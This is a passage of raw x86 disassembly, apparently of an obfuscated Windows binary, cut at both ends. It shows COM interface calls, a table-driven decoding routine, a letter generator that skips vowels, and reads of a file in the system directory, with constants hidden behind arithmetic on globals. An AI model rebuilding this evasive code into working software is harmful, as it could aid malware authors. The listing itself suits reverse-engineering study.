mov eax, dword_44B138
sub eax, 2
cmp ebx, eax
jnz loc_43B2B6
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44B0D4
movsx edx, word_44B0E0
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_43B2AA
mov eax, dword_44B0A8
sub eax, 3
neg eax
mov [ebp+var_40E5C], eax
push offset dword_44C7C0
call sub_442838
push eax
call ds:dword_445044
mov [ebp+var_30E44], eax
push offset dword_44C7B0
call sub_442838
add esp, 8
push eax
call ds:dword_445044
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_444C90
loc_43A760: ; CODE XREF: sub_43A503+D7B�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
movsx eax, word_44B118
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_43A7C7
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44B0F8
sub eax, 7
cmp ebx, eax
jnz loc_43B26C
push offset byte_44C79F
call sub_43DF30
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
add esp, 0Ch
jmp loc_43A8D3
; ---------------------------------------------------------------------------
loc_43A7C7: ; CODE XREF: sub_43A503+27D�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push offset dword_44C8D0
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B090
sub eax, 2
cmp ebx, eax
jnz loc_43B26C
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, dword_44B134
sub eax, 4
cmp ebx, eax
jz short loc_43A860
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43B26C
; ---------------------------------------------------------------------------
loc_43A860: ; CODE XREF: sub_43A503+34A�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44B0D8
sub eax, 3
cmp ebx, eax
jz short loc_43A89E
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_43B26C
; ---------------------------------------------------------------------------
loc_43A89E: ; CODE XREF: sub_43A503+37C�j
push offset dword_44C790
call sub_43DF30
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 18h
loc_43A8D3: ; CODE XREF: sub_43A503+2BF�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44B10C
movsx edx, word_44B130
add eax, edx
sub eax, 7
cmp ebx, eax
jnz loc_43B26C
mov eax, dword_44B0D4
movsx edx, word_44B0F0
add eax, edx
sub eax, 5
mov [ebp+var_30E50], eax
jmp loc_43B25A
; ---------------------------------------------------------------------------
loc_43A91D: ; CODE XREF: sub_43A503+D63�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
mov eax, dword_44B094
movsx edx, word_44B130
add eax, edx
mov edx, dword_44B09C
add edx, dword_44B144
sub edx, 3
mov [ebp+eax+var_50E9F], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44B0C4
sub eax, 4
cmp ebx, eax
jnz loc_43B254
push offset word_44C782
call sub_43DF30
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push offset dword_44C890
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B148
sub eax, 2
cmp ebx, eax
jnz loc_43AEDD
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, dword_44B148
add eax, dword_44B098
sub eax, 7
cmp ebx, eax
jnz loc_43AED1
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_43C65F
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call ds:dword_44ABA0
movsx eax, word_44B130
movsx edx, word_44B13C
add eax, edx
sub eax, 0Bh
mov [ebp+var_40E9C], eax
jmp short loc_43AAC3
; ---------------------------------------------------------------------------
loc_43AA7C: ; CODE XREF: sub_43A503+5CC�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44B0FC
add edx, 0Ah
cmp eax, edx
jz short loc_43AAAA
mov edx, dword_44B134
add edx, 4
add edx, dword_44B0AC
cmp eax, edx
jnz short loc_43AABD
loc_43AAAA: ; CODE XREF: sub_43A503+592�j
mov eax, [ebp+var_40E9C]
mov edx, dword_44B0D4
mov [ebp+eax+var_60E9F], dl
loc_43AABD: ; CODE XREF: sub_43A503+5A5�j
inc [ebp+var_40E9C]
loc_43AAC3: ; CODE XREF: sub_43A503+577�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_43AA7C
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_444C90
mov eax, dword_44B0D8
sub eax, 3
mov [ebp+var_40E9C], eax
loc_43AAF2: ; CODE XREF: sub_43A503+73A�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_43AB02: ; CODE XREF: sub_43A503+604�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43AB02
mov [ebp+var_60EA8], eax
mov edx, dword_44B110
sub edx, 8
cmp eax, edx
jz short loc_43AB2C
mov edx, dword_44B0B0
add edx, 0C3h
cmp eax, edx
jbe short loc_43AB31
loc_43AB2C: ; CODE XREF: sub_43A503+617�j
jmp loc_43AC11
; ---------------------------------------------------------------------------
loc_43AB31: ; CODE XREF: sub_43A503+627�j
movsx eax, word_44B130
add eax, dword_44B09C
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_43AB71
; ---------------------------------------------------------------------------
loc_43AB49: ; CODE XREF: sub_43A503+67A�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word_44B0F4
add edx, 20h
cmp eax, edx
jnz short loc_43AB7F
inc [ebp+var_60EA4]
loc_43AB71: ; CODE XREF: sub_43A503+644�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_43AB49
loc_43AB7F: ; CODE XREF: sub_43A503+666�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz loc_43AC11
mov eax, dword_44B144
add eax, dword_44B0C8
sub eax, 3
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_43F8DA
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, dword_44B0D0
add eax, 0FFFEh
add eax, dword_44B0BC
cmp [ebp+var_60EDC], eax
jnz short loc_43AC11
push offset byte_44C77D
call sub_43DF30
push eax
lea edi, [ebp+var_50E9B]
push edi
call ds:dword_445020
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call ds:dword_445020
add esp, 14h
loc_43AC11: ; CODE XREF: sub_43A503:loc_43AB2C�j
; sub_43A503+688�j ...
mov eax, [ebp+var_60EA8]
mov edx, dword_44B100
movsx ecx, word_44B130
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_43AAF2
mov eax, dword_44B0D4
add eax, dword_44B110
sub eax, 8
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_43AC60: ; CODE XREF: sub_43A503+762�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43AC60
mov [ebp+var_60EA8], eax
mov eax, dword_44B138
movsx edx, word_44B11C
add eax, edx
sub eax, 4
mov [ebp+var_40E9C], eax
jmp loc_43AEA2
; ---------------------------------------------------------------------------
loc_43AC89: ; CODE XREF: sub_43A503+9AB�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44B0A8
add edx, 17h
add edx, dword_44B098
cmp eax, edx
jz short loc_43ACB1
and [ebp+var_60EAC], 0
loc_43ACB1: ; CODE XREF: sub_43A503+7A5�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word_44B0F0
add edx, 1Bh
cmp eax, edx
jnz loc_43AE4E
mov eax, dword_44B0FC
sub eax, 3
cmp [ebp+var_40E9C], eax
jbe loc_43ADA3
mov eax, [ebp+var_40E9C]
movsx edx, word_44B120
add edx, dword_44B0C8
sub edx, 0Bh
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
movsx edx, word_44B118
add edx, 17h
cmp eax, edx
jle short loc_43AD35
mov edx, dword_44B0C0
add edx, 28h
movsx ecx, word_44B0A4
add edx, ecx
cmp eax, edx
jl short loc_43AD99
loc_43AD35: ; CODE XREF: sub_43A503+81A�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44B0F4
movsx ecx, word_44B120
lea edx, [edx+ecx+31h]
cmp eax, edx
jle short loc_43AD68
mov edx, dword_44B0A8
add edx, 36h
movsx ecx, word_44B0CC
add edx, ecx
cmp eax, edx
jl short loc_43AD99
loc_43AD68: ; CODE XREF: sub_43A503+84D�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44B0A4
mov ecx, dword_44B124
lea edx, [edx+ecx+73h]
cmp eax, edx
jle short loc_43ADA3
movsx edx, word_44B11C
mov ecx, dword_44B110
lea edx, [edx+ecx+75h]
cmp eax, edx
jge short loc_43ADA3
loc_43AD99: ; CODE XREF: sub_43A503+830�j
; sub_43A503+863�j
mov [ebp+var_60EAC], 1
loc_43ADA3: ; CODE XREF: sub_43A503+7DC�j
; sub_43A503+87F�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_43AE4E
mov eax, [ebp+var_40E9C]
mov edx, dword_44B128
inc edx
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B0A8
add edx, 1Ch
cmp eax, edx
jle short loc_43ADF2
mov edx, dword_44B104
add edx, 2Eh
cmp eax, edx
jl short loc_43AE44
loc_43ADF2: ; CODE XREF: sub_43A503+8E0�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44B0D0
add edx, 36h
add edx, dword_44B0FC
cmp eax, edx
jle short loc_43AE1A
movsx edx, word_44B0A4
add edx, 3Ch
cmp eax, edx
jl short loc_43AE44
loc_43AE1A: ; CODE XREF: sub_43A503+907�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44B11C
mov ecx, dword_44B0F8
lea edx, [edx+ecx+71h]
cmp eax, edx
jle short loc_43AE4E
mov edx, dword_44B0A8
lea edx, [edx+edx+77h]
cmp eax, edx
jge short loc_43AE4E
loc_43AE44: ; CODE XREF: sub_43A503+8ED�j
; sub_43A503+915�j
mov [ebp+var_60EAC], 1
loc_43AE4E: ; CODE XREF: sub_43A503+7C8�j
; sub_43A503+8AC�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_43AE77
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_43AE77: ; CODE XREF: sub_43A503+952�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44B10C
add edx, 1Dh
cmp eax, edx
jnz short loc_43AE9C
mov [ebp+var_60EAC], 1
loc_43AE9C: ; CODE XREF: sub_43A503+98D�j
inc [ebp+var_40E9C]
loc_43AEA2: ; CODE XREF: sub_43A503+781�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_43AC89
mov eax, [ebp+var_60EB4]
movsx edx, word_44B0B8
add edx, dword_44B0EC
sub edx, 2
mov [ebp+eax+var_50E9B], dl
loc_43AED1: ; CODE XREF: sub_43A503+52E�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43AEDD: ; CODE XREF: sub_43A503+500�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push offset dword_44C8B0
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44B104
add eax, dword_44B0B0
sub eax, 7
cmp ebx, eax
jnz loc_43B1F3
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word_44B0E0
sub eax, 8
cmp ebx, eax
jnz loc_43B1E7
mov eax, dword_44B0BC
add eax, dword_44B098
sub eax, 6
mov [ebp-50EA0h], eax
jmp loc_43B1D5
; ---------------------------------------------------------------------------
loc_43AF58: ; CODE XREF: sub_43A503+CDE�j
push dword_44B128
call ds:dword_44A630
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
movsx eax, word_44B0A4
sub eax, 5
cmp ebx, eax
jnz loc_43B1CF
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push offset dword_44C890
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44B14C
sub eax, 4
cmp ebx, eax
jnz loc_43B1C3
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44B0BC
movsx edx, word_44B0A0
add eax, edx
sub eax, 6
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_43B037
cmp [ebp+var_60EF0], 8
jz short loc_43B03C
loc_43B037: ; CODE XREF: sub_43A503+B28�j
jmp loc_43B1B7
; ---------------------------------------------------------------------------
loc_43B03C: ; CODE XREF: sub_43A503+B32�j
mov eax, dword_44B0EC
add eax, dword_44B124
movsx edx, word_44B12C
sub edx, 4
mov byte ptr [ebp+eax+var_70EF4+3], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_43C65F
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call ds:dword_44ABA0
mov eax, dword_44B148
movsx edx, word_44B0E4
add eax, edx
movsx eax, byte ptr [ebp+eax+var_70EF8+1]
mov edx, dword_44B0D8
sub edx, 3
cmp eax, edx
jz loc_43B1B7
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_43E2B0
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
movsx eax, word_44B0CC
sub eax, 7
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word_44B0A0
movsx edx, word_44B0B8
add eax, edx
mov edx, dword_44B0AC
add edx, dword_44B134
sub edx, 6
mov [ebp+eax+var_71F0E], dl
or ebx, ebx
jnz short loc_43B142
cmp [ebp+var_60EF0], 8
jnz short loc_43B142
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_43C65F
add esp, 8
mov edi, eax
inc edi
mov [ebp-71F10h], edi
push [ebp+var_60EE8]
call ds:dword_44ABA0
loc_43B142: ; CODE XREF: sub_43A503+C09�j
; sub_43A503+C13�j
push offset byte_44C775
call sub_43DF30
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44A634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
push offset dword_44C770
call sub_43DF30
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
add esp, 34h
loc_43B1B7: ; CODE XREF: sub_43A503:loc_43B037�j
; sub_43A503+BA0�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B1C3: ; CODE XREF: sub_43A503+AF3�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B1CF: ; CODE XREF: sub_43A503+ABC�j
inc dword ptr [ebp-50EA0h]
loc_43B1D5: ; CODE XREF: sub_43A503+A50�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_43AF58
loc_43B1E7: ; CODE XREF: sub_43A503+A36�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B1F3: ; CODE XREF: sub_43A503+A0F�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, dword_44B0A8
sub edx, 4
cmp eax, edx
jz short loc_43B254
push offset byte_44C76D
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_445020
push offset dword_44C768
call sub_43DF30
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_445020
add esp, 1Ch
loc_43B254: ; CODE XREF: sub_43A503+496�j
; sub_43A503+D0E�j
inc [ebp+var_30E50]
loc_43B25A: ; CODE XREF: sub_43A503+415�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_43A91D
loc_43B26C: ; CODE XREF: sub_43A503+29E�j
; sub_43A503+322�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_43A760
lea eax, [ebp+var_30D40]
push eax
call ds:dword_44A62C
pop ecx
push [ebp+var_30E44]
call ds:dword_44ABA0
push [ebp+var_30E48]
call ds:dword_44ABA0
loc_43B2AA: ; CODE XREF: sub_43A503+203�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B2B6: ; CODE XREF: sub_43A503+1D5�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B2C2: ; CODE XREF: sub_43A503+1B0�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B2CE: ; CODE XREF: sub_43A503+CB�j
; sub_43A503:loc_43A622�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B2DA: ; CODE XREF: sub_43A503+51�j
; sub_43A503+9B�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A503 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B2DF proc near ; CODE XREF: sub_43B8FD+EF�p
; sub_43BAE4+1A5�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, dword_44B0EC
add eax, dword_44B128
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_43B413
; ---------------------------------------------------------------------------
loc_43B30E: ; CODE XREF: sub_43B2DF+13C�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, dword_44B278[edx]
movsx eax, word_44B0E0
sub eax, 7
neg eax
cmp esi, eax
jz loc_43B412
mov eax, [ebp+var_8]
or eax, eax
jl loc_43B40F
cmp eax, 3
jg loc_43B40F
jmp off_44B678[eax*4]
loc_43B34A: ; DATA XREF: .data:off_44B678�o
inc [ebp+var_8]
jmp loc_43B40F
; ---------------------------------------------------------------------------
loc_43B352: ; CODE XREF: sub_43B2DF+64�j
; DATA XREF: .data:0044B67C�o
mov edx, [ebp+var_C]
movsx ecx, word_44B120
sub ecx, 6
mov eax, edx
shl eax, cl
mov [ebp+var_18], eax
mov edx, esi
and edx, 30h
mov ecx, dword_44B09C
movsx eax, word_44B114
add ecx, eax
sub ecx, 2
mov eax, edx
sar eax, cl
mov edx, [ebp+var_18]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43B40F
; ---------------------------------------------------------------------------
loc_43B396: ; CODE XREF: sub_43B2DF+64�j
; DATA XREF: .data:0044B680�o
mov edx, [ebp+var_C]
and edx, 0Fh
movsx ecx, word_44B114
mov eax, dword_44B094
lea ecx, [ecx+eax+1]
mov eax, edx
shl eax, cl
mov [ebp+var_1C], eax
mov edx, esi
and edx, 3Ch
movsx ecx, word_44B0B4
sub ecx, 3
mov eax, edx
sar eax, cl
mov edx, [ebp+var_1C]
or edx, eax
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
inc [ebp+var_8]
jmp short loc_43B40F
; ---------------------------------------------------------------------------
loc_43B3DB: ; CODE XREF: sub_43B2DF+64�j
; DATA XREF: .data:0044B684�o
mov edx, [ebp+var_C]
and edx, 3
movsx ecx, word_44B090
add ecx, 4
mov eax, edx
shl eax, cl
mov edx, eax
or edx, esi
mov [ebp+var_D], dl
mov eax, ebx
inc ebx
mov dl, [ebp+var_D]
mov [eax], dl
mov eax, dword_44B148
add eax, dword_44B09C
sub eax, 5
mov [ebp+var_8], eax
loc_43B40F: ; CODE XREF: sub_43B2DF+55�j
; sub_43B2DF+5E�j ...
mov [ebp+var_C], esi
loc_43B412: ; CODE XREF: sub_43B2DF+4A�j
inc edi
loc_43B413: ; CODE XREF: sub_43B2DF+2A�j
cmp byte ptr [edi], 0
jz short loc_43B421
cmp ebx, [ebp+var_4]
jb loc_43B30E
loc_43B421: ; CODE XREF: sub_43B2DF+137�j
cmp byte ptr [edi], 0
jnz short loc_43B42D
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_43B439
; ---------------------------------------------------------------------------
loc_43B42D: ; CODE XREF: sub_43B2DF+145�j
movsx eax, word_44B0E0
sub eax, 7
neg eax
loc_43B439: ; CODE XREF: sub_43B2DF+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B2DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B43E proc near ; CODE XREF: sub_442961+2FD�p
; sub_442961+3EE�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, dword_44B0DC
add edi, dword_44B0F8
sub edi, 0Fh
cmp edx, edi
jnz short loc_43B468
mov eax, [ebp+arg_0]
jmp short loc_43B482
; ---------------------------------------------------------------------------
loc_43B468: ; CODE XREF: sub_43B43E+23�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_43B482: ; CODE XREF: sub_43B43E+28�j
pop edi
pop esi
leave
retn
sub_43B43E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B486 proc near ; CODE XREF: sub_442143+9B�p
; sub_442143+D2�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_43B4C7
cmp al, 79h
jz short loc_43B4C7
cmp al, 75h
jz short loc_43B4C7
cmp al, 69h
jz short loc_43B4C7
cmp al, 6Fh
jz short loc_43B4C7
cmp al, 61h
jnz short loc_43B4CB
loc_43B4C7: ; CODE XREF: sub_43B486+2B�j
; sub_43B486+2F�j ...
add [ebp+arg_0], 1
loc_43B4CB: ; CODE XREF: sub_43B486+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_43B4D5
add [ebp+arg_0], 1
loc_43B4D5: ; CODE XREF: sub_43B486+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_43B486 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B4DD proc near ; CODE XREF: sub_43D966+174�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_444148
push offset byte_44C763
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset byte_44C75B
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
movsx eax, word_44B114
sub eax, 3
push eax
push 3
push 0
mov eax, dword_44B0AC
sub eax, 2
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_43B596
mov eax, dword_44B0C0
sub eax, 3
mov edx, [ebp+arg_0]
mov ecx, dword_44B0D0
mov [edx+eax], cl
jmp short loc_43B605
; ---------------------------------------------------------------------------
loc_43B596: ; CODE XREF: sub_43B4DD+A1�j
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_170]
push eax
movsx eax, word_44B108
add eax, 0Fh
push eax
push [ebp+arg_0]
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_16C], eax
push edi
call ds:dword_449650 ; CloseHandle
movsx eax, word_44B0E4
sub eax, 6
cmp [ebp+var_16C], eax
jnz short loc_43B605
mov eax, dword_44B100
add eax, dword_44B0B0
sub eax, 8
mov edx, [ebp+arg_0]
movsx ecx, word_44B0A4
add ecx, dword_44B128
sub ecx, 5
mov [edx+eax], cl
loc_43B605: ; CODE XREF: sub_43B4DD+B7�j
; sub_43B4DD+102�j
pop edi
pop esi
leave
retn
sub_43B4DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B609 proc near ; CODE XREF: sub_43BAE4+113�p
; DATA XREF: sub_43D966+BE�o
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_267]
push eax
call sub_444148
push offset word_44C756
call sub_43DF30
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset word_44C74E
call sub_43DF30
push eax
